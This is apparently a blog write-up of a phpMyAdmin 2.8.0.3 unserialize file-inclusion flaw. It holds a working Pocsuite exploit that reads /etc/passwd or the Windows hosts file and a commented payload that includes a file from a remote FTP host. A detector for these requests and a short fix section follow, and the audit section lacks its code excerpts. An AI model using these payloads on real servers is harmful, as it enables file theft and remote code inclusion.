
phpMyAdmin 2.8.0.3 Arbitrary File Inclusion Vulnerability

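0x01 Code audit
The vulnerable file is /scripts/setup.php, lines 10 and 28:

The configuration value passed in is unserialized, and setup.php includes common.lib.php.
In common.lib.php, line 555:

common.lib.php includes Config.class.php.

Next, look at Config.class.php, line 284:

Finally, the load method:

0x02 Reproducing the vulnerability
PoC: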


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re


class TestPOC(POCBase):
    vulID = '1'  # ssvid
    version = '1.0'
    author = ['whoam1']
    vulDate = '2016-04-23'
    createDate = '2016-08-24'
    updateDate = '2016-08-24'
    references = ['http://www.seebug.org/vuldb/ssvid-']
    name = 'phpmyadmin unserialize getshell'
    appPowerLink = 'https://www.phpmyadmin.net/'
    appName = 'phpmyadmin'
    appVersion = '2.8.0.3'
    vulType = '文件包含'  # file inclusion
    desc = '''
/scripts/setup.php
'''
    samples = ['']
    install_requires = ['']
    # Avoid third-party libraries where possible; if one is needed, fill in this field as described at
    # https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明

    def _attack(self):
        #configuration=O:10:"PMA_Config":1:{s:6:"source",s:38:"ftp://user:[email protected]/ftp.txt";}&action=test
        return self._verify()

    def _verify(self):
        result = {}
        requ = req.get(self.url)
        # Session cookie issued by the target, sent back with the POST
        coo = re.compile(r"'phpMyAdmin=(.*?);")
        cookie = coo.findall(str(requ.headers))[0]
        # Value of the Server response header, used to choose the test file
        flag = re.compile(r"erver': '(.*?)',")
        flags = flag.findall(str(requ.headers))[0]
        vul_url = self.url + '/scripts/setup.php'
        header = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'cookie': 'phpMyAdmin=' + str(cookie),
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
        }
        if '(' in flags:
            # Server header contains '(': request /etc/passwd
            poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'
            req_post = req.post(vul_url, headers=header, data=poc)
            if '/bin/bash' in req_post.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
            return self.parse_output(result)
        else:
            # Otherwise request the Windows hosts file
            poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:37:"c:/windows/system32/drivers/etc/hosts";}&action=test'
            req_post = req.post(vul_url, headers=header, data=poc)
            if 'Windows' in req_post.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
            return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


0x03 Fix
Upgrade to the latest version.
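
A defender-side check for the request shape this chain depends on: a POST to /scripts/setup.php whose configuration field contains a serialized PHP object. This is an added example, not part of the original post or of phpMyAdmin; the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# PHP's serialize() writes an object as O:<len>:"<Class>":<props>:{ ... }
# (C: is the variant used by classes implementing Serializable).
PHP_OBJECT = re.compile(r'[OC]:\+?\d+:"([^"]+)":\d+:\{')
SETUP_PATH = re.compile(r'/scripts/setup\.php$', re.IGNORECASE)


def form_fields(body):
    """Yield decoded (name, value) pairs from an x-www-form-urlencoded body."""
    for pair in body.split('&'):
        name, _, value = pair.partition('=')
        yield unquote_plus(name), unquote_plus(value)


def inspect_request(method, path, body):
    """Return a finding if a POST to setup.php carries a serialized object
    in the 'configuration' field, otherwise None."""
    path_only = path.split('?', 1)[0]
    if method.upper() != 'POST' or not SETUP_PATH.search(path_only):
        return None
    for name, value in form_fields(body):
        classes = PHP_OBJECT.findall(value) if name == 'configuration' else []
        if classes:
            return {'path': path_only, 'classes': classes,
                    'sets_source': '"source"' in value}
    return None


# Constructed sample requests (method, path, body); the first body is the
# /etc/passwd test string from the PoC above, the second is it URL-encoded.
SAMPLES = [
    ('POST', '/phpmyadmin/scripts/setup.php',
     'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'),
    ('POST', '/scripts/setup.php?lang=en',
     'configuration=O%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%2C'
     's%3A11%3A%22%2Fetc%2Fpasswd%22%3B%7D&action=test'),
    ('POST', '/scripts/setup.php',
     'configuration=a:1:{s:7:"Servers";a:0:{}}&action=test'),
    ('GET', '/index.php', ''),
]


def scan(samples):
    """Return the findings for every sample that matches."""
    return [f for f in (inspect_request(*s) for s in samples) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLES):
        print(finding)
```

The third sample, a serialized array with no object in it, is an assumed stand-in for an ordinary setup submission and is not flagged.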

All articles on this blog are original unless otherwise noted. Author: 老王. When copying or reposting, please credit 极客中国 with a hyperlink.